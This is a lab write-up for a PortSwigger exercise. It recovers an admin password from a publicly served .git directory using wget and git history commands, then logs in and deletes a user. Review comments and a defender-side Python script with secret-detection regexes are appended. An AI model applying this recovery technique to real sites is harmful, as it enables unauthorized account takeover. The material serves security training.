PortSwigger Lab: Information disclosure in version control history

Jun Takemura · March 6, 2025


Task

This lab discloses sensitive information via its version control history. To solve the lab, obtain the password for the administrator user then log in and delete the user carlos.

Attempt

I was able to access https://ID.web-security-academy.net/.git. Under .git/COMMIT_EDITMSG I found a message ‘Remove admin password from config’.

As the message said, there was no password in config:

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[user]
	email = [email protected]
	name = Carlos Montoya

I downloaded the entire git directory for further inspection:

wget -r https://0aa400fb0385876c84a7827d00b000b8.web-security-academy.net/.git

The -r option means recursive, so wget follows the links it finds and downloads the whole .git directory tree.

git status showed admin.conf had been deleted:

❯ git status
On branch master
Changes not staged for commit:
  (use "git add/rm <file>..." to update what will be committed)
  (use "git restore <file>..." to discard changes in working directory)
        deleted:    admin.conf
        deleted:    admin_panel.php

no changes added to commit (use "git add" and/or "git commit -a")

`git diff`:

diff --git a/admin.conf b/admin.conf
deleted file mode 100644
index 21d23f1..0000000
--- a/admin.conf
+++ /dev/null
@@ -1 +0,0 @@
-ADMIN_PASSWORD=env('ADMIN_PASSWORD')
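Review bot: Deleting admin.conf here only drops the HEAD copy, which already reads the value through env('ADMIN_PASSWORD'); the literal password committed in 5010e5069a579076e121b6df94ae6dfbd4f7db47 remains in the object store and is one `git show <commit>:admin.conf` away. Treat that credential as compromised and rotate it, and keep the .git directory out of the served document root (or deny requests for /.git at the web server) instead of relying on file deletions.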
diff --git a/admin_panel.php b/admin_panel.php
deleted file mode 100644
index 8944e3b..0000000
--- a/admin_panel.php
+++ /dev/null
@@ -1 +0,0 @@
-<?php echo 'TODO: build an amazing admin panel, but remember to check the password!'; ?>
\ No newline at end of file
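Review bot: admin_panel.php consists only of a placeholder reminding the author to check the password; there is no authentication check in this hunk, so the file should not have been deployed under the web root until one exists. Minor: add a trailing newline, since the diff reports `\ No newline at end of file`.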

I couldn’t find the password in the diff.

git log -- admin.conf:

commit 03447d4a0f9c1d069facab65709c8c0e816204be (HEAD -> master)
Author: Carlos Montoya <[email protected]>
Date:   Tue Jun 23 14:05:07 2020 +0000

    Remove admin password from config

commit 5010e5069a579076e121b6df94ae6dfbd4f7db47
Author: Carlos Montoya <[email protected]>
Date:   Mon Jun 22 16:23:42 2020 +0000

    Add skeleton admin panel

The older version of the file can be viewed with git show 5010e5069a579076e121b6df94ae6dfbd4f7db47:admin.conf. This revealed the password ADMIN_PASSWORD=rp2br7ahdpc0hm4rmrwe. I logged in with the credentials administrator:rp2br7ahdpc0hm4rmrwe and deleted carlos.
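The two lessons of this lab are that a served .git directory is recoverable with ordinary git commands, and that a "remove password" commit does not remove the password from history. The following is an added defender-side audit example; it is not code from the write-up or from PortSwigger. It fingerprints a /.git/HEAD response body, scans every historical file revision for credential keys assigned a literal value (as opposed to the env('ADMIN_PASSWORD') indirection the lab's HEAD revision uses), and reports the ones that are no longer present at HEAD. The sample history, commit ids and secret value are constructed placeholders; the `git_revisions` adapter assumes `git` is on PATH and is not exercised by the sample.

```python
"""Exposure audit for a repository whose .git directory might be served.

Added example, not code from the write-up: two checks a defender would run
against their own deployment, plus an adapter that enumerates a real
repository with git plumbing.  All sample inputs below are constructed.
"""
import re
import subprocess
from typing import Dict, Iterable, List, NamedTuple, Tuple

# A .git/HEAD file is either a symbolic ref ("ref: refs/heads/master") or a
# bare 40-hex object id.  An HTML 404 page or a directory listing does not
# have this shape, so a 200 with this body means the repository is served.
_GIT_HEAD = re.compile(r"^(?:ref: refs/\S+|[0-9a-f]{40})$")

# KEY=value or KEY: value lines whose key names a credential.
_SECRET_ASSIGN = re.compile(
    r"^\s*(?P<key>[A-Za-z0-9_.-]*(?:PASSWORD|PASSWD|SECRET|TOKEN|API_KEY)"
    r"[A-Za-z0-9_.-]*)\s*[=:]\s*(?P<value>.+?)\s*$",
    re.IGNORECASE,
)

# Values that only reference the environment are not leaks, e.g. the
# env('ADMIN_PASSWORD') form in the lab's HEAD revision.
_INDIRECT_VALUE = re.compile(r"^(?:env\(|getenv\(|os\.environ|\$\{?[A-Za-z_])")


class Finding(NamedTuple):
    commit: str
    path: str
    key: str
    value: str


def looks_like_git_head(body: str) -> bool:
    """True if the body returned for /.git/HEAD is really a Git HEAD file."""
    return bool(_GIT_HEAD.match(body.strip()))


def literal_secrets(text: str) -> List[Tuple[str, str]]:
    """Return (key, value) pairs where a credential key is assigned a literal value."""
    found = []
    for line in text.splitlines():
        m = _SECRET_ASSIGN.match(line)
        if not m:
            continue
        value = m.group("value").strip("'\"")
        if not value or _INDIRECT_VALUE.match(value):
            continue  # empty or pulled from the environment: not a leak
        found.append((m.group("key"), value))
    return found


def scan_history(revisions: Iterable[Tuple[str, str, str]]) -> List[Finding]:
    """revisions yields (commit, path, content) for every file version ever committed."""
    return [
        Finding(commit, path, key, value)
        for commit, path, content in revisions
        for key, value in literal_secrets(content)
    ]


def audit(revisions: Iterable[Tuple[str, str, str]], head_files: Dict[str, str]) -> List[Finding]:
    """Historical literal secrets that are absent from HEAD.

    These are exactly what a "remove password from config" commit hides from a
    casual `git diff` while leaving them one `git show <commit>:<path>` away.
    """
    at_head = {
        (path, key, value)
        for path, content in head_files.items()
        for key, value in literal_secrets(content)
    }
    return [f for f in scan_history(revisions) if (f.path, f.key, f.value) not in at_head]


def git_revisions(repo: str) -> List[Tuple[str, str, str]]:
    """Adapter for a real checkout (assumption: `git` is on PATH).

    Walks every reachable commit and reads each file with plumbing commands
    only: rev-list, ls-tree and show.
    """
    def git(*args: str) -> str:
        return subprocess.run(
            ["git", "-C", repo, *args],
            check=True, capture_output=True, text=True, errors="replace",
        ).stdout

    out: List[Tuple[str, str, str]] = []
    for rev in git("rev-list", "--all").split():
        for path in git("ls-tree", "-r", "--name-only", rev).splitlines():
            out.append((rev, path, git("show", f"{rev}:{path}")))
    return out


# Constructed sample history (not the lab's real data): the credential is
# committed as a literal, rewritten to read from the environment, then the
# file is deleted.  Commit ids and the secret value are placeholders.
SAMPLE_HISTORY = [
    ("aaaa111", "admin.conf", "ADMIN_PASSWORD=example-literal-value\n"),
    ("bbbb222", "admin.conf", "ADMIN_PASSWORD=env('ADMIN_PASSWORD')\n"),
    ("cccc333", "README.md", "Set ADMIN_PASSWORD in the environment.\n"),
]
SAMPLE_HEAD = {"README.md": "Set ADMIN_PASSWORD in the environment.\n"}

if __name__ == "__main__":
    for f in audit(SAMPLE_HISTORY, SAMPLE_HEAD):
        print(f"{f.path}@{f.commit}: {f.key} is a literal in history but not at HEAD")
```

Run against the sample, `audit` reports the admin.conf literal from the first commit even though HEAD has no admin.conf at all; on a real checkout, feed it `git_revisions(path)` and a dict of the working-tree files. Any finding means the value must be rotated, since rewriting or deleting the file does not un-publish it.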

Byebye Carlos and now the lab’s completed.
